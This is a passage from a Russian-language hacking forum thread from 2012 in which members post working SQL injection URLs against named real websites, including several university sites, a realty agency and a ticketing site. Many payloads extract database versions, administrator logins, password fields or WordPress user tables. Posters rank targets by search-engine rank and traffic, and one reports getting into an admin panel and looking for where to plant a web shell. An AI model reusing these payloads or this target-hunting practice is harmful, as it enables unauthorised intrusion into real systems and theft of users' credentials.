HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14971  
Старый 12.05.2012, 17:41
m0m
Guest
Сообщений: n/a
Провел на форуме:
24169

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Бедный сайт, его уже 4 года подряд хакают
Ну что поделаешь, наверно администраторы думают: Если сменить пароли взломы прекратятся.

Теперь взлом данного сайта стал традицией (Как Nasa.gov)
 
Ответить с цитированием

  #14972  
Старый 12.05.2012, 20:59
DTW
Участник форума
Регистрация: 11.05.2008
Сообщений: 202
Провел на форуме:
420713

Репутация: 104
По умолчанию

Билеты

Цитата:
Сообщение от None  
http://www.mog-solutions.com/produtos.php?ID=-105 union select 1,2,(select concat_ws(0x2e,ticket_number) from TicketInfo limit 1,1),4,5,6,7,8,9,0,1--
 
Ответить с цитированием

  #14973  
Старый 12.05.2012, 22:23
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

ТИЦ == 160, PR == 3, DMOZ == true, ЯК == true;

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.photohistory.ru/index.php?pid=1207248187984132+and+(select+1+from(select+count(*),concat(database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #14974  
Старый 13.05.2012, 16:00
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

http://bec.ucla.EDU/news.php?id=-90+union+select+1,version(),3,4,5,6,7,8,9,10,11--

PR 6

http://www.ece.unm.EDU/news.php?id=-363+union+select+1,version(),3,4,5,6,7,8--

PR 5 ТИЦ 30
 
Ответить с цитированием

  #14975  
Старый 13.05.2012, 19:41
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

В меру упитанный сайт.

ТИЦ == 2800, PR == 3, ЯК ==true, DMOZ == true, траф == 12k;

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.study.ru/test/test.php?id=91'/**/and/**/(select/**/1/**/from(select/**/count(*),concat(database(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1[/COLOR][/COLOR] 
 
Ответить с цитированием

  #14976  
Старый 13.05.2012, 21:30
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Немного Европы

Inject

_ttp://shanghai.phil-lowe.eu/index.asp?entry_id=8'+and+1=@@version+and+1='1

System User: sa

Inject

_ttp://www.voelkl.eu/index.php?entry_id=8+and+substring((@@version),1,1 )=5

PR=3

В админку попал, шелл лить негде...
 
Ответить с цитированием

  #14977  
Старый 13.05.2012, 22:03
DTW
Участник форума
Регистрация: 11.05.2008
Сообщений: 202
Провел на форуме:
420713

Репутация: 104
По умолчанию

cimco

Цитата:
Сообщение от None  
http://www.cimco.com/news_description.php3?id=148 and 1 = (select tablename||chr(58)||rulename from pg_rules limit 1 offset 1)::int--
 
Ответить с цитированием

  #14978  
Старый 14.05.2012, 00:04
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

Не люблю риэлтеров.

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.nightskyrealty.ru/show_res_lot.php?lot=417+and+(select+1+from( select+count(*),concat(database(),floor(rand(0)*2) )x+from+information_schema.tables+group+by+x)a)--[/COLOR][/COLOR] 
Вывод в
 
Ответить с цитированием

  #14979  
Старый 14.05.2012, 01:32
Gaben7
Guest
Сообщений: n/a
Провел на форуме:
28549

Репутация: 6
По умолчанию

edu

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//cs.furman.edu/blog/index.php?id=null%20union%20all%20select%201,group_concat%28id,0x3a,user,0x3a,password%29 ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26%20from%20zp_a dministrators--

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.bzu.edu.pk/news/newsdesc.php?id=2+and+1=0+union+s elect+1,concat%28username,0x3a,password%29,3,4 ,5,6%20FROM%20users%20--

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//mulibraries.missouri.edu/about/adoptabook/after-details.php?id=-189+u nion+s elect+1,2,3,4,concat%28version%28%29,0x3a,u ser%28%29,0x3a,database%28%29%29,6,7,8+from+information_Schema.tables

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.uta.edu/engineering/50/question.php?id=-1+union+select+1,concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+adlogin

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.lspr.edu/dev/news/academic.php?id=-90%20union%20all%20select%201,2,3,4,5,6,group_concat%28username,0x3a,p assword%29,8%20from%20lspr_l ogin--

[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.punp.edu.ph/main.php?id=-1+u nion+select+1,2,concat%28login,0x3a,pwd%29,4,5+f rom+u sers[/COLOR][/COLOR] 
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.enlightenmentquartet.com/index.php?id=-999+a nd+1=0+union+all+select+g roup_concat(ID,0x3a,user_login,0x3a,user_p ass,0x3a,user_email),2+from+wp_users--[/COLOR][/COLOR] 
 
Ответить с цитированием

  #14980  
Старый 14.05.2012, 14:43
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

pr8

Код:
Code:
http://www.ied.edu.hk/jol_e-mag/eng/personality.php?article_id=-50'+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7+--+
temp_sqlsite42@its8c.ied.edu.hk:4.0.27-standard:temp_sqlsite42
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ